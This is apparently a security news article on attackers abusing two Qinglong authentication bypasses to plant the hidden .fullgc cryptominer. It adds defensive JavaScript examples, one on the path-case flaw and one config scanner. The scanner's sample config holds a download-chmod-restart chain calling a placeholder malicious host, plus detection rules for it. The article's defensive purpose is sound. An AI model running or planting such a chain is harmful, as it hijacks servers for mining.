Qinglong RCE flaws exploited to install cryptominers on exposed servers
Hackers exploited two authentication bypass vulnerabilities in the Qinglong task scheduler to run cryptominers on publicly exposed servers. The attacks targeted self-hosted Qinglong panels and used remote code execution to install a hidden miner named .fullgc.
The flaws affect Qinglong 2.20.1 and earlier. Qinglong is an open-source timed task management platform used to run Python, JavaScript, Shell, and TypeScript scripts through a web panel.
Security researchers linked the activity to CVE-2026-3965 and CVE-2026-4047. Both issues involved the way Qinglong handled protected API routes, which allowed attackers to reach sensitive functions without valid authentication.
Attackers abused exposed Qinglong panels
The campaign appears to have started in early February 2026, when users began reporting sudden CPU spikes on affected servers. Some systems reportedly reached 85% to 100% CPU usage after the miner started running in the background.
The malware used the name .fullgc, which can look like a normal Java garbage collection reference during a quick process check. This naming choice helped attackers hide the miner from administrators who were only doing a basic review.
Snyk researchers said attackers modified Qinglong’s configuration file and used it to download the miner, save it as a hidden file, make it executable, and restart it if someone killed the process.
What the two Qinglong vulnerabilities did
| Vulnerability | Issue | Impact |
|---|---|---|
| CVE-2026-3965 | A URL rewrite rule exposed protected admin endpoints through an unauthenticated path. | An attacker could reset admin credentials and take control of the panel. |
| CVE-2026-4047 | The authentication check treated API paths as case-sensitive, while Express.js routing did not. | An attacker could reach protected command execution endpoints without logging in. |
CVE-2026-3965 came from a rewrite rule that mapped open routes to API routes in a way that bypassed the intended access check. This let an attacker reach an admin initialization function through a path that did not require authentication.
CVE-2026-4047 came from a mismatch between Qinglong’s middleware and Express.js routing behavior. The middleware compared the request path against one lowercase API path prefix, while the Express router, which matches routes case-insensitively by default, still accepted the same path with changed letter casing and sent the request to the protected API route.
This type of bug matters because security checks and routing logic must interpret requests the same way. When middleware sees one path and the application router sees another, attackers can sometimes slip past the protection layer.
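The middleware/router mismatch described above, as an added example that is not Qinglong's or Snyk's code: a self-contained Node.js model of a prefix guard that reads the raw path, next to one that normalises the path the way Express's default case-insensitive router does, plus the test-suite check that guard and router agree on every sample path. The protected prefix and the sample paths are constructed stand-ins, not Qinglong's real routes.

```javascript
// Added example (not Qinglong's or Snyk's code) modelling the CVE-2026-4047 bug class:
// Express matches routes case-insensitively by default, so "/API/x" and "/api/x"
// reach the same handler, while a guard that compares the raw request path against
// a lowercase prefix treats them differently.

// Constructed stand-in for the protected prefix; Qinglong's real routes are not reproduced.
const PROTECTED_PREFIX = '/api/';

// Stand-in for Express's default (caseSensitive: false) router: compares case-folded paths.
function routerMatches(routePrefix, requestPath) {
  return requestPath.toLowerCase().startsWith(routePrefix.toLowerCase());
}

// Vulnerable guard: raw path against the lowercase prefix, so "/API/..." is not recognised.
function vulnerableRequiresAuth(requestPath) {
  return requestPath.startsWith(PROTECTED_PREFIX);
}

// Hardened guard: decide with exactly the normalisation the router applies.
function hardenedRequiresAuth(requestPath) {
  return routerMatches(PROTECTED_PREFIX, requestPath);
}

// Defence in depth: the protected handler re-checks the caller itself, so a
// guard/router mismatch alone does not expose the action.
function protectedHandler(hasValidToken) {
  return hasValidToken ? 'handled-protected' : 'denied';
}

// Simulated pipeline: guard first, then routing. Returns 'denied',
// 'handled-protected' or 'not-found'. With handlerRechecks the handler
// enforces authentication on its own as well.
function handle(requestPath, requiresAuth, hasValidToken, handlerRechecks = false) {
  if (requiresAuth(requestPath) && !hasValidToken) return 'denied';
  if (routerMatches(PROTECTED_PREFIX, requestPath)) {
    return handlerRechecks ? protectedHandler(hasValidToken) : 'handled-protected';
  }
  return 'not-found';
}

// Test-suite check: the guard must agree with the router on every sample path,
// otherwise some spelling of a protected path reaches the handler unguarded.
function guardAgreesWithRouter(requiresAuth, paths) {
  return paths.every((p) => requiresAuth(p) === routerMatches(PROTECTED_PREFIX, p));
}

// Constructed sample paths, including mixed-case variants of the protected prefix.
const SAMPLE_PATHS = ['/api/jobs', '/API/jobs', '/Api/jobs', '/open/status', '/'];
```

Running `guardAgreesWithRouter` over a project's own route table as a unit test catches this class of mismatch before it ships.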
Timeline of the Qinglong cryptomining campaign
| Date | Event |
|---|---|
| February 7 to 8, 2026 | Users began reporting .fullgc miner infections and heavy CPU usage. |
| February 10, 2026 | Community members pushed for a wider public warning. |
| February 27, 2026 | The authentication bypass issues were publicly reported. |
| March 1, 2026 | Qinglong maintainers merged a fix and released version 2.20.2. |
| April 2026 | Security researchers published wider analysis of the exploitation campaign. |
The attacks gained attention first inside Chinese developer forums and GitHub issue threads. That delayed wider awareness in the English-speaking security community, even though affected users had already seen clear signs of compromise.
Qinglong’s popularity increased the risk. The project has more than 19,000 GitHub stars and thousands of forks, and many users deploy it through Docker on cloud servers or home networks.
Self-hosted automation dashboards create a large attack surface when users expose them directly to the internet. If attackers can reach the panel, a single authentication bug can become a server-level compromise.
How admins should respond now
- Update Qinglong to version 2.20.2 or later immediately.
- Rebuild or refresh Docker containers instead of relying only on old running images.
- Check the server for hidden .fullgc files and unknown background processes.
- Review Qinglong configuration files for unexpected shell commands.
- Rotate Qinglong admin credentials after patching.
- Place Qinglong behind a VPN, private network, or access-controlled reverse proxy.
- Block public access to the panel unless remote access is truly required.
- Monitor CPU, outbound traffic, and new scheduled tasks for unusual activity.
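The configuration review step in the list above, as an added example that is not Snyk's or Qinglong's code: a small Node.js scanner that flags lines matching the persistence chain the article describes (remote download, hidden file, chmod +x, restart loop, the .fullgc name). The sample config text, its setting names and the placeholder host are constructed.

```javascript
// Added example, not from Qinglong or Snyk. Flags lines in a scheduler config or
// startup script that match the persistence chain described in the article.
// The sample text, its setting names and the placeholder host are constructed.
const SAMPLE_CONFIG = `
# constructed sample, not a real Qinglong config
SOME_SETTING=value
export SOME_PATH=/usr/bin/python3
# constructed injected block; MALICIOUS-HOST.example is a placeholder, not a real indicator
curl -s http://MALICIOUS-HOST.example/payload -o /tmp/.fullgc
chmod +x /tmp/.fullgc
while true; do pgrep -f .fullgc >/dev/null || /tmp/.fullgc & sleep 60; done &
`;

// Each rule is one link of the chain; a single hit is a lead, several together are strong.
const RULES = [
  { id: 'download', re: /\b(curl|wget)\b[^\n]*\bhttps?:\/\//i, why: 'fetches remote content' },
  { id: 'hidden-file', re: /\/\.[A-Za-z0-9_-]+/, why: 'references a dot-prefixed (hidden) file' },
  { id: 'make-exec', re: /\bchmod\s+(\+x|[0-7]{3,4})\b/, why: 'marks a file executable' },
  { id: 'restart-loop', re: /\bwhile\s+true\b|\bpgrep\b|\bnohup\b/, why: 'keeps a process alive or restarts it' },
  { id: 'known-name', re: /\.fullgc\b/, why: 'matches the miner name reported in this campaign' },
];

// Returns one finding per (line, rule) hit; comments and blank lines are skipped.
function scanConfig(text) {
  const findings = [];
  text.split('\n').forEach((raw, i) => {
    const line = raw.trim();
    if (!line || line.startsWith('#')) return;
    for (const r of RULES) {
      if (r.re.test(line)) findings.push({ line: i + 1, rule: r.id, why: r.why, text: line });
    }
  });
  return findings;
}

// Rolls findings up: which rules fired, and whether the download-plus-persist chain is present.
function summarize(findings) {
  const rules = [...new Set(findings.map((f) => f.rule))].sort();
  const chain = rules.includes('download') && (rules.includes('make-exec') || rules.includes('restart-loop'));
  return { rules, chain, count: findings.length };
}

// Usage on the constructed sample. Legitimate dot-prefixed paths (e.g. ~/.bashrc)
// also trip 'hidden-file' on real systems, so treat single hits as leads, not verdicts.
const REPORT = summarize(scanConfig(SAMPLE_CONFIG));
```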
Updating alone may not remove malware from a system that attackers already compromised. Administrators should check for persistence, unexpected scripts, and suspicious files before returning the panel to normal use.
Server owners should also treat this incident as a reminder to avoid exposing admin dashboards directly to the internet. Even open-source tools with active maintainers can become risky when management panels sit on public ports without another access layer.
Qinglong users who rely on the platform for automation should review logs from early February onward. Any unexplained CPU spikes, new scripts, changed configuration files, or unknown outbound connections should trigger a deeper investigation.
Why this incident matters
The Qinglong campaign shows how quickly attackers can turn a niche self-hosted tool into a cryptomining target. They did not need a broad consumer platform. They needed reachable dashboards, a working bypass, and enough server resources to monetize.
The vulnerabilities also show a common web security problem. Middleware, route rewriting, and framework behavior must line up exactly, especially around authentication. Small differences in path handling can create high-impact access control failures.
For developers, the lesson is clear: authorization checks should happen as close as possible to the protected action. For admins, the safer approach is just as simple: patch fast, reduce exposure, and never leave powerful automation panels open to the internet.
Summary
- Hackers exploited two Qinglong authentication bypass flaws to deploy the .fullgc cryptominer.
- The affected versions include Qinglong 2.20.1 and earlier.
- The attack targeted publicly exposed self-hosted panels.
- Qinglong version 2.20.2 includes the fix.
- Admins should patch, inspect systems for compromise, and restrict public access.
FAQ
Qinglong is an open-source timed task management platform. It lets users manage scheduled scripts written in languages such as Python, JavaScript, Shell, and TypeScript.
Qinglong 2.20.1 and earlier are affected. Users should update to version 2.20.2 or later.
Attackers installed a hidden cryptominer named .fullgc. The miner consumed server resources and caused heavy CPU usage.
No. Updating closes the vulnerability, but admins should also remove suspicious files, check configuration changes, rotate credentials, and review logs.